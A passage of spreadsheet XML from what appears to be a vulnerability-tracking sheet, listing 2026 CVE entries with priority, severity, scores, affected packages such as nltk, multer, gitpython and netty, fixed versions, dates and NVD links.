      <c r="R1026" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1026" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1026" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85360</t>
        </is>
      </c>
    </row>
    <row r="1027">
      <c r="A1027" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1027" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1027" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86135</t>
        </is>
      </c>
      <c r="D1027" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1027" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1027" s="5" t="inlineStr">
        <is>
          <t>5d1c2695-1a31-4499-88ae-e847036fd7e3</t>
        </is>
      </c>
      <c r="G1027" s="5" t="inlineStr"/>
      <c r="H1027" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1027" s="5" t="inlineStr"/>
      <c r="J1027" s="5" t="inlineStr"/>
      <c r="K1027" s="5" t="inlineStr"/>
      <c r="L1027" s="5" t="inlineStr"/>
      <c r="M1027" s="5" t="inlineStr"/>
      <c r="N1027" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1027" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1027" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1027" s="5" t="inlineStr"/>
      <c r="R1027" s="5" t="inlineStr">
        <is>
          <t>CWE-352, CWE-400</t>
        </is>
      </c>
      <c r="S1027" s="5" t="inlineStr">
        <is>
          <t>A Cross-Site Request Forgery (CSRF) vulnerability in WatchGuard Dimension's database snapshot creation feature allows a remote attacker to trigger unauthorized snapshot creation by tricking an authenticated administrator into visiting a specially crafted web page.</t>
        </is>
      </c>
      <c r="T1027" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86135</t>
        </is>
      </c>
    </row>
    <row r="1028">
      <c r="A1028" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1028" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1028" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50646</t>
        </is>
      </c>
      <c r="D1028" s="5" t="inlineStr"/>
      <c r="E1028" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1028" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1028" s="5" t="inlineStr"/>
      <c r="H1028" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I1028" s="5" t="inlineStr"/>
      <c r="J1028" s="5" t="inlineStr"/>
      <c r="K1028" s="5" t="inlineStr"/>
      <c r="L1028" s="5" t="inlineStr">
        <is>
          <t>NuGet:Microsoft.WindowsDesktop.App.Runtime.win-arm64, NuGet:Microsoft.WindowsDesktop.App.Runtime.win-x64, NuGet:Microsoft.WindowsDesktop.App.Runtime.win-x86</t>
        </is>
      </c>
      <c r="M1028" s="5" t="inlineStr">
        <is>
          <t>10.0.10, 8.0.29, 9.0.18</t>
        </is>
      </c>
      <c r="N1028" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1028" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1028" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1028" s="5" t="inlineStr"/>
      <c r="R1028" s="5" t="inlineStr"/>
      <c r="S1028" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1028" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50646</t>
        </is>
      </c>
    </row>
    <row r="1029">
      <c r="A1029" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1029" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1029" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62384</t>
        </is>
      </c>
      <c r="D1029" s="5" t="inlineStr"/>
      <c r="E1029" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1029" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1029" s="5" t="inlineStr"/>
      <c r="H1029" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I1029" s="5" t="inlineStr"/>
      <c r="J1029" s="5" t="inlineStr"/>
      <c r="K1029" s="5" t="inlineStr"/>
      <c r="L1029" s="5" t="inlineStr">
        <is>
          <t>PyPI:nltk</t>
        </is>
      </c>
      <c r="M1029" s="5" t="inlineStr">
        <is>
          <t>3.10.2</t>
        </is>
      </c>
      <c r="N1029" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1029" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1029" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1029" s="5" t="inlineStr"/>
      <c r="R1029" s="5" t="inlineStr"/>
      <c r="S1029" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1029" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62384</t>
        </is>
      </c>
    </row>
    <row r="1030">
      <c r="A1030" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1030" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1030" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62385</t>
        </is>
      </c>
      <c r="D1030" s="5" t="inlineStr"/>
      <c r="E1030" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1030" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1030" s="5" t="inlineStr"/>
      <c r="H1030" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1030" s="5" t="inlineStr"/>
      <c r="J1030" s="5" t="inlineStr"/>
      <c r="K1030" s="5" t="inlineStr"/>
      <c r="L1030" s="5" t="inlineStr">
        <is>
          <t>PyPI:nltk</t>
        </is>
      </c>
      <c r="M1030" s="5" t="inlineStr">
        <is>
          <t>3.10.0</t>
        </is>
      </c>
      <c r="N1030" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1030" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1030" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1030" s="5" t="inlineStr"/>
      <c r="R1030" s="5" t="inlineStr"/>
      <c r="S1030" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1030" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62385</t>
        </is>
      </c>
    </row>
    <row r="1031">
      <c r="A1031" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1031" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1031" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62815</t>
        </is>
      </c>
      <c r="D1031" s="5" t="inlineStr"/>
      <c r="E1031" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F1031" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1031" s="5" t="inlineStr"/>
      <c r="H1031" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I1031" s="5" t="inlineStr"/>
      <c r="J1031" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K1031" s="5" t="inlineStr"/>
      <c r="L1031" s="5" t="inlineStr">
        <is>
          <t>NuGet:Microsoft.Native.Quic.MsQuic.OpenSSL, NuGet:Microsoft.Native.Quic.MsQuic.Schannel</t>
        </is>
      </c>
      <c r="M1031" s="5" t="inlineStr">
        <is>
          <t>2.4.19, 2.5.10</t>
        </is>
      </c>
      <c r="N1031" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1031" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1031" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1031" s="5" t="inlineStr"/>
      <c r="R1031" s="5" t="inlineStr"/>
      <c r="S1031" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1031" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62815</t>
        </is>
      </c>
    </row>
    <row r="1032">
      <c r="A1032" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1032" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1032" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63312</t>
        </is>
      </c>
      <c r="D1032" s="5" t="inlineStr"/>
      <c r="E1032" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1032" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1032" s="5" t="inlineStr"/>
      <c r="H1032" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I1032" s="5" t="inlineStr"/>
      <c r="J1032" s="5" t="inlineStr"/>
      <c r="K1032" s="5" t="inlineStr"/>
      <c r="L1032" s="5" t="inlineStr">
        <is>
          <t>PyPI:nltk</t>
        </is>
      </c>
      <c r="M1032" s="5" t="inlineStr">
        <is>
          <t>3.10.0</t>
        </is>
      </c>
      <c r="N1032" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1032" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1032" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1032" s="5" t="inlineStr"/>
      <c r="R1032" s="5" t="inlineStr"/>
      <c r="S1032" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1032" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63312</t>
        </is>
      </c>
    </row>
    <row r="1033">
      <c r="A1033" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1033" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1033" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69222</t>
        </is>
      </c>
      <c r="D1033" s="5" t="inlineStr"/>
      <c r="E1033" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1033" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1033" s="5" t="inlineStr"/>
      <c r="H1033" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1033" s="5" t="inlineStr"/>
      <c r="J1033" s="5" t="inlineStr"/>
      <c r="K1033" s="5" t="inlineStr"/>
      <c r="L1033" s="5" t="inlineStr">
        <is>
          <t>npm:liquidjs</t>
        </is>
      </c>
      <c r="M1033" s="5" t="inlineStr">
        <is>
          <t>10.27.2</t>
        </is>
      </c>
      <c r="N1033" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1033" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1033" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1033" s="5" t="inlineStr"/>
      <c r="R1033" s="5" t="inlineStr"/>
      <c r="S1033" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1033" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69222</t>
        </is>
      </c>
    </row>
    <row r="1034">
      <c r="A1034" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1034" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1034" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70626</t>
        </is>
      </c>
      <c r="D1034" s="5" t="inlineStr"/>
      <c r="E1034" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1034" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1034" s="5" t="inlineStr"/>
      <c r="H1034" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1034" s="5" t="inlineStr"/>
      <c r="J1034" s="5" t="inlineStr"/>
      <c r="K1034" s="5" t="inlineStr"/>
      <c r="L1034" s="5" t="inlineStr">
        <is>
          <t>PyPI:nltk</t>
        </is>
      </c>
      <c r="M1034" s="5" t="inlineStr">
        <is>
          <t>3.9.4</t>
        </is>
      </c>
      <c r="N1034" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1034" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1034" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1034" s="5" t="inlineStr"/>
      <c r="R1034" s="5" t="inlineStr"/>
      <c r="S1034" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1034" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70626</t>
        </is>
      </c>
    </row>
    <row r="1035">
      <c r="A1035" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1035" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1035" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72789</t>
        </is>
      </c>
      <c r="D1035" s="5" t="inlineStr"/>
      <c r="E1035" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1035" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1035" s="5" t="inlineStr"/>
      <c r="H1035" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1035" s="5" t="inlineStr"/>
      <c r="J1035" s="5" t="inlineStr"/>
      <c r="K1035" s="5" t="inlineStr"/>
      <c r="L1035" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/siyuan-note/siyuan/kernel</t>
        </is>
      </c>
      <c r="M1035" s="5" t="inlineStr">
        <is>
          <t>0.0.0-20260726020813-a25c2dd06aae</t>
        </is>
      </c>
      <c r="N1035" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1035" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1035" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q1035" s="5" t="inlineStr"/>
      <c r="R1035" s="5" t="inlineStr"/>
      <c r="S1035" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1035" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72789</t>
        </is>
      </c>
    </row>
    <row r="1036">
      <c r="A1036" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1036" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1036" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73294</t>
        </is>
      </c>
      <c r="D1036" s="5" t="inlineStr"/>
      <c r="E1036" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F1036" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1036" s="5" t="inlineStr"/>
      <c r="H1036" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I1036" s="5" t="inlineStr"/>
      <c r="J1036" s="5" t="inlineStr"/>
      <c r="K1036" s="5" t="inlineStr"/>
      <c r="L1036" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/semaphoreui/semaphore</t>
        </is>
      </c>
      <c r="M1036" s="5" t="inlineStr">
        <is>
          <t>0.0.0-20260704181911-7e8a9434bd81</t>
        </is>
      </c>
      <c r="N1036" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1036" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1036" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q1036" s="5" t="inlineStr"/>
      <c r="R1036" s="5" t="inlineStr"/>
      <c r="S1036" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1036" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73294</t>
        </is>
      </c>
    </row>
    <row r="1037">
      <c r="A1037" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1037" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1037" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75595</t>
        </is>
      </c>
      <c r="D1037" s="5" t="inlineStr"/>
      <c r="E1037" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F1037" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1037" s="5" t="inlineStr"/>
      <c r="H1037" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1037" s="5" t="inlineStr"/>
      <c r="J1037" s="5" t="inlineStr"/>
      <c r="K1037" s="5" t="inlineStr"/>
      <c r="L1037" s="5" t="inlineStr">
        <is>
          <t>Maven:io.netty:netty-handler</t>
        </is>
      </c>
      <c r="M1037" s="5" t="inlineStr">
        <is>
          <t>4.1.137.Final, 4.2.17.Final</t>
        </is>
      </c>
      <c r="N1037" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1037" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1037" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1037" s="5" t="inlineStr"/>
      <c r="R1037" s="5" t="inlineStr"/>
      <c r="S1037" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1037" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75595</t>
        </is>
      </c>
    </row>
    <row r="1038">
      <c r="A1038" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1038" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1038" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75604</t>
        </is>
      </c>
      <c r="D1038" s="5" t="inlineStr"/>
      <c r="E1038" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F1038" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1038" s="5" t="inlineStr"/>
      <c r="H1038" s="5" t="n">
        <v>0.025</v>
      </c>
      <c r="I1038" s="5" t="inlineStr"/>
      <c r="J1038" s="5" t="inlineStr"/>
      <c r="K1038" s="5" t="inlineStr"/>
      <c r="L1038" s="5" t="inlineStr">
        <is>
          <t>npm:next</t>
        </is>
      </c>
      <c r="M1038" s="5" t="inlineStr">
        <is>
          <t>15.5.24, 16.3.3</t>
        </is>
      </c>
      <c r="N1038" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1038" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1038" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1038" s="5" t="inlineStr"/>
      <c r="R1038" s="5" t="inlineStr"/>
      <c r="S1038" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1038" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75604</t>
        </is>
      </c>
    </row>
    <row r="1039">
      <c r="A1039" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1039" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1039" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77037</t>
        </is>
      </c>
      <c r="D1039" s="5" t="inlineStr"/>
      <c r="E1039" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1039" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1039" s="5" t="inlineStr"/>
      <c r="H1039" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1039" s="5" t="inlineStr"/>
      <c r="J1039" s="5" t="inlineStr"/>
      <c r="K1039" s="5" t="inlineStr"/>
      <c r="L1039" s="5" t="inlineStr">
        <is>
          <t>npm:multer</t>
        </is>
      </c>
      <c r="M1039" s="5" t="inlineStr">
        <is>
          <t>2.3.0</t>
        </is>
      </c>
      <c r="N1039" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1039" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1039" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1039" s="5" t="inlineStr"/>
      <c r="R1039" s="5" t="inlineStr"/>
      <c r="S1039" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1039" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77037</t>
        </is>
      </c>
    </row>
    <row r="1040">
      <c r="A1040" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1040" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1040" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77078</t>
        </is>
      </c>
      <c r="D1040" s="5" t="inlineStr"/>
      <c r="E1040" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1040" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1040" s="5" t="inlineStr"/>
      <c r="H1040" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1040" s="5" t="inlineStr"/>
      <c r="J1040" s="5" t="inlineStr"/>
      <c r="K1040" s="5" t="inlineStr"/>
      <c r="L1040" s="5" t="inlineStr">
        <is>
          <t>npm:multer</t>
        </is>
      </c>
      <c r="M1040" s="5" t="inlineStr">
        <is>
          <t>2.3.0</t>
        </is>
      </c>
      <c r="N1040" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1040" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1040" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1040" s="5" t="inlineStr"/>
      <c r="R1040" s="5" t="inlineStr"/>
      <c r="S1040" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1040" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77078</t>
        </is>
      </c>
    </row>
    <row r="1041">
      <c r="A1041" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1041" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1041" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78675</t>
        </is>
      </c>
      <c r="D1041" s="5" t="inlineStr"/>
      <c r="E1041" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1041" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1041" s="5" t="inlineStr"/>
      <c r="H1041" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1041" s="5" t="inlineStr"/>
      <c r="J1041" s="5" t="inlineStr"/>
      <c r="K1041" s="5" t="inlineStr"/>
      <c r="L1041" s="5" t="inlineStr">
        <is>
          <t>PyPI:gitpython</t>
        </is>
      </c>
      <c r="M1041" s="5" t="inlineStr">
        <is>
          <t>3.1.59</t>
        </is>
      </c>
      <c r="N1041" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1041" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1041" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1041" s="5" t="inlineStr"/>
      <c r="R1041" s="5" t="inlineStr"/>
      <c r="S1041" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1041" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78675</t>
        </is>
      </c>
    </row>
    <row r="1042">
      <c r="A1042" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1042" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1042" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78676</t>
        </is>
      </c>
      <c r="D1042" s="5" t="inlineStr"/>
      <c r="E1042" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F1042" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1042" s="5" t="inlineStr"/>
      <c r="H1042" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1042" s="5" t="inlineStr"/>
      <c r="J1042" s="5" t="inlineStr"/>
      <c r="K1042" s="5" t="inlineStr"/>
      <c r="L1042" s="5" t="inlineStr">
        <is>
          <t>PyPI:gitpython</t>
        </is>
      </c>
      <c r="M1042" s="5" t="inlineStr">
        <is>
          <t>3.1.59</t>
        </is>
      </c>
      <c r="N1042" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1042" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1042" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1042" s="5" t="inlineStr"/>
      <c r="R1042" s="5" t="inlineStr"/>
      <c r="S1042" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1042" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78676</t>
        </is>
      </c>
    </row>
    <row r="1043">
      <c r="A1043" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1043" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1043" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78677</t>
        </is>
      </c>
      <c r="D1043" s="5" t="inlineStr"/>
      <c r="E1043" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1043" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1043" s="5" t="inlineStr"/>
      <c r="H1043" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1043" s="5" t="inlineStr"/>
      <c r="J1043" s="5" t="inlineStr"/>
      <c r="K1043" s="5" t="inlineStr"/>
      <c r="L1043" s="5" t="inlineStr">
        <is>
          <t>PyPI:gitpython</t>
        </is>
      </c>
      <c r="M1043" s="5" t="inlineStr">
        <is>
          <t>3.1.59</t>
        </is>
      </c>
      <c r="N1043" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1043" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1043" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1043" s="5" t="inlineStr"/>
      <c r="R1043" s="5" t="inlineStr"/>
      <c r="S1043" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1043" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78677</t>
        </is>
      </c>
    </row>
    <row r="1044">
      <c r="A1044" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1044" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1044" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78681</t>
        </is>
      </c>
      <c r="D1044" s="5" t="inlineStr"/>
